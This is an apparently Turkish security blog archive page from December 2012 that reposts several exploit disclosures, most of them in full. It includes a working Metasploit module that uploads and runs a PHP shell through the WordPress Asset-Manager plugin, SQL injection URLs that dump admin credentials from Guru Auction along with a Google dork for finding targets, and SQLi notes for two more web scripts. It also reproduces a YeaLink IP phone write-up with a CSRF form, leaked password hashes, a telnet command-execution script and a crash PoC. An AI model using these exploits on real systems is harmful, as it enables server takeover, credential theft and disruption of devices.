Archive for 26 Aralık 2012

WordPress Asset-Manager PHP File Upload Vulnerability

WordPress Asset-Manager PHP File Upload Açığı Bulunmuş Olup, metasploit remote exploit aşağıdadır. Açık sayesinde shell upload edilebilmekte, server üzerinde zararlı yazılımlar çalıştırma imkanı bulunmaktadır. Uplad dizinlerinin açık kapatılıncaya kadar silinmesi yerinde olacaktır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpClient
        include Msf::Exploit::PhpEXE

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
                        'Description'    => %q{
                                This module exploits a vulnerability found in Asset-Manager <= 2.0   WordPress
                                plugin.  By abusing the upload.php file, a malicious user can upload a file to a
                                temp directory without authentication, which results in arbitrary code execution.
                        },
                        'Author'         =>
                                [
                                        'Sammy FORGIT', # initial discovery
                                        'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                                ],
                        'License'        => MSF_LICENSE,
                        'References'     =>
                                [
                                        [ 'OSVDB', '82653' ],
                                        [ 'BID', '53809' ],
                                        [ 'EDB', '18993' ],
                                        [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-asset-manager-shell-upload-vulnerability.html' ]
                                ],
                        'Payload'            =>
                                {
                                        'BadChars' => "\x00",
                                },
                        'Platform'       => 'php',
                        'Arch'           => ARCH_PHP,
                        'Targets'        =>
                                [
                                        [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                                        [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                                ],
                        'DefaultTarget' => 0,
                        'DisclosureDate' => 'May 26 2012'))

                register_options(
                        [
                                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
                        ], self.class)
        end

        def exploit
                uri =  target_uri.path
                uri << '/' if uri[-1,1] != '/'
                peer = "#{rhost}:#{rport}"
                payload_name = "#{rand_text_alpha(5)}.php"
                php_payload = get_write_exec_payload(:unlink_self=>true)

                data = Rex::MIME::Message.new
                data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
                post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

                print_status("#{peer} - Uploading payload #{payload_name}")
                res = send_request_cgi({
                        'method'  => 'POST',
                        'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
                        'ctype'   => "multipart/form-data; boundary=#{data.bound}",
                        'data'    => post_data
                })

                if not res or res.code != 200 or res.body !~ /#{payload_name}/
                        fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
                end

                print_status("#{peer} - Executing payload #{payload_name}")
                res = send_request_raw({
                        'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
                        'method'  => 'GET'
                })

                if res and res.code != 200
                        fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
                end
        end
end

Guru Auction 2.0 Multiple SQL Injection Vulnerabilities

Guru Auction 2.0 Multiple SQL Injection açığıl Bulundu. “detail.php?item_id=” de meydana gelen sql injection açığı sayesinde, bir takım verilere ulaşılabilmekte. Açık bulucuların açığın oluşum yeri, açığın kullanımı ve açığın yarattığı tehlikelere ilişkin açıklamaları aşağıdaki şekildedir;

     )   )            )                     (   (         (   (    (       )     ) 
  ( /(( /( (       ( /(  (       (    (     )\ ))\ )      )\ ))\ ) )\ ) ( /(  ( /( 
  )\())\()))\ )    )\()) )\      )\   )\   (()/(()/(  (  (()/(()/((()/( )\()) )\())
 ((_)((_)\(()/(   ((_)((((_)(  (((_)(((_)(  /(_))(_)) )\  /(_))(_))/(_))(_)\|((_)\ 
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_))  _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \|   \| __| _ \ |  |_ _|| \| | |/ / 
 \ V / (_) || (_ |\ V / / _ \  | (__ / _ \ |   /| |) | _||   / |__ | | | .` | ' <  
  |_| \___/  \___| |_| /_/ \_\  \___/_/ \_\|_|_\|___/|___|_|_\____|___||_|\_|_|\_\
                                                                                .WEB.ID
-----------------------------------------------------------------------
        Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
-----------------------------------------------------------------------
Author          : v3n0m
Site            : http://ycl.sch.id/
Date            : December, 26-2012
Location        : Yogyakarta, Indonesia
Time Zone       : GMT +7:00

Application     : Guru Auction 2.0
Price           : $49
Vendor          : http://www.guruscript.com/
Google Dork     : inurl:subcat.php?cate_id=
-----------------------------------------------------------------------

SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--


Blind SQLi p0c:
~~~~~~~~~~
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@,1,1)=5 << true
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@,1,1)=4 << false


Default Admin Page:
~~~~~~~~~~
http://domain.tld/[path]/admin/

-----------------------------------------------------------------------

Thanks:

LeQhi, lingah, Ozie, m4rc0, g0nz, L1ntang, GheMaX, chainloader, SakitJiwa, Susant, dextone, drubicza, f4c0

City Directory Review and Rating Script (search.php) SQL Injection Vulnerability

City Directory Review and Rating Script (search.php) SQL Injection Açığı bulunmuş olup açığa ilişkin açık bulucunun açıklamaları şu şekilde;

# Exploit Title: City Directory Review and Rating Script SQL Injection
Vulnerability
# Date: 22.12.2012
# Author: 3spi0n
# Script Vendor or Software Link:
http://b-scripts.com/en/18-city-reviewer-yelp-clone.html
# Category: WebApps
# Type: SQL Injection [MySQLi]
# Tested On: Ubuntu 12.10 - Win7

=================================================
# Demo: http://b-scripts.com/demo/city_reviewer/

# MySQLi Detected On:
http://server/city_reviewer/search.php?category=6


=================================================

# My Blog: www.Ryuzaki.in
# Social : 
# My Team: Grayhatz Inc. & Agedz Corp.
# Turkey.

MyBB AwayList Plugin (index.php, id parameter) SQL Injection Vulnerability

MyBB AwayList Eklentisinde SQL Injection Açıkları bulunmuştur. Açık index.php?action=editAwlItem&id=[SQLi] kaynaklanmakta olup, Açık bulucunun Açığın kullanımına ilişkin açıklamalamaları aşağıdaki şekildedir.

# Exploit Title: AwayList MyBB plugin SQLi 0day
# Exploit Author: Red_Hat [Team Vect0r]
# Software Link: http://mods.mybb.com/view/awaylist
# Tested on: Windows & Linux.


Vulnerable code :

<?php
$query = $db->simple_select( // 245
        "awaylist", '*', "id = '" . $mybb->input['id'] . "'" // 246
    ); // 247
    $item = $db->fetch_array($query); // 248
?>

The variable '$mybb->input['id']' remains unsanitized.

Usage : http://server/index.php?action=editAwlItem&id=[SQLi]

Shoutout to Zixem <3 & Team Vect0r :3

YeaLink IP Phone SIP-TxxP firmware 9.70.0.100 Multiple Vulnerabilities

YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 versiyonunda [0x01] - Hidden page to enable telnet + CSRF, [0x02] - Default telnet shell users + passwords alınabilmekte, shadow okunabilmekte olup, perl exploiti ve açık bulucunun açık oluşum yerleri, açığın kullanımına ilişkin açıklamaları aşağıdaki şekildedir; [sourcecode language="plain"]#+--------------------------------------------------------------------------------------------------------------------------------+ # Exploit Title : YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 Multiple Vulnerabilities # Date : 12-21-2012 # Author : xistence (xistence<[AT]>0x90.nl) # Software link : http://yealink.com/SupportDownloadfiles_detail.aspx?ProductsID=64&CateID=187&flag=142 # Vendor site : http://yealink.com # Version : 9.70.0.100 and lower # Tested on : YeaLink IP Phone SIP-T20P (hardware VoIP phone) # # Vulnerability : Multiple Vulnerabilities as described below # #+--------------------------------------------------------------------------------------------------------------------------------+ [0x01] - Hidden page to enable telnet + CSRF The hidden page http://<IP>/cgi-bin/ConfigManApp.com?Id=10 contains an option to enable Telnet on the phone. Only the "admin" user can access this page. However the unprivileged user "user" can post directly to ConfigManApp.com and enable Telnet. This default user "user" has the password "user" and is unlikely to be changed by a user. Also CSRF to enable this is possible: <html> <head> <title>Download</title> </head> <body> <form name="csrf" action="http://<IP>/cgi-bin/ConfigManApp.com" method="post"> <input type="hidden" name="PAGEID" value="10"/> <input type="hidden" name="CONFIG_DATA" value="1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260"/> </form> <script> document.csrf.submit(); </script> </body> </html> [0x02] - Default telnet shell users + passwords The shell users are hardcoded in the firmware images and are always the same and can't be changed through the webinterface. So after enabling telnet through the hidden page shell access could go unnoticed. /etc/passwd: root:x:0:0:Root,,,:/:/bin/sh admin:x:500:500:Admin,,,:/:/bin/sh guest:x:501:501:Guest,,,:/:/bin/sh /etc/shadow: root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7::: admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7::: guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7::: <- password is "guest" /etc/group: root:x:0:admin,root guest:x:1:guest The file "/tmp/.htpasswd" is world readable and contains the "admin" password for the web interface. [0x03] - Exploit The following exploit logs in with the unprivileged user "user" and password "user" in the web interface. Here it enables telnet, logs in with the default user "guest" and password "guest" and executes the shell command specified. An example is to do a "cat /tmp/.htpasswd" to retrieve the admin password for the web interface. #!/usr/bin/python import urllib, urllib2, getpass, sys, telnetlib print "" print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 hidden page telnet enabler + default guest shell account command execution - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "" if (len(sys.argv) != 3): print "[*] Usage: " + sys.argv[0] + " <IP of Phone> <command to execute>" print "[*] i.e.:" + sys.argv[0] + " 127.0.0.1 \"cat /tmp/.htpasswd\"" print "" exit(0) phoneIP = sys.argv[1] shellCmd = sys.argv[2] phoneUrl = 'http://%s/cgi-bin/ConfigManApp.com' % phoneIP webUser = 'user' webPass = 'user' telnetUser = 'guest' telnetPass = 'guest' passman = urllib2.HTTPPasswordMgrWithDefaultRealm() passman.add_password(None, phoneUrl, webUser, webPass) authhandler = urllib2.HTTPBasicAuthHandler(passman) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) post_params = urllib.urlencode([("PAGEID", "10"), ("CONFIG_DATA", "1%261%261%261%260%261%261%260%261%261%260%26%260%260%260%260%260%261%261%260%260")]) print "[*] Enable telnet on [ %s ] by posting directly to the hidden page with PAGEID=10 parameter as unprivileged user [ user ]" % phoneUrl pagehandle = urllib2.urlopen(phoneUrl, post_params) print "[*] Making telnet connection to [ %s ] with default user [ %s ] and password [ %s ]" % ( phoneIP, telnetUser, telnetPass ) tn = telnetlib.Telnet(phoneIP) tn.read_until("IPPHONE login: ") tn.write(telnetUser + "\n") if telnetPass: tn.read_until("Password: ") tn.write(telnetPass + "\n") tn.read_until("$") print "[*] Executing shell command [ %s ]" % shellCmd tn.write( shellCmd + '\n' ) tn.read_until( shellCmd ) print tn.read_until("$").strip("$ ") tn.write("exit\n") tn.read_all() [0x04] - Remote "/yealink/bin/macd" buffer overflow crash PoC The following PoC exploit will crash the "/yealink/bin/macd" process on port "12345" #!/usr/bin/python import socket,sys,time,struct if len(sys.argv) < 2: print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "[-] Usage: %s <target addr> " % sys.argv[0] sys.exit(0) target = sys.argv[1] if len(sys.argv) > 2: platform = sys.argv[2] buffer = "\x41"*75 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) try: s.connect((target,12345)) except: print "[-] Connection to "+target+" failed!" sys.exit(0) print "[*] YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 /yealink/bin/macd remote buffer overflow crash PoC - xistence (xistence<[at]>0x90.nl) - 2012-12-21" print "[*] Sending " + `len(buffer)` + " byte crash" s.send(buffer + "\r\n") s.recv(1024) [/sourcecode]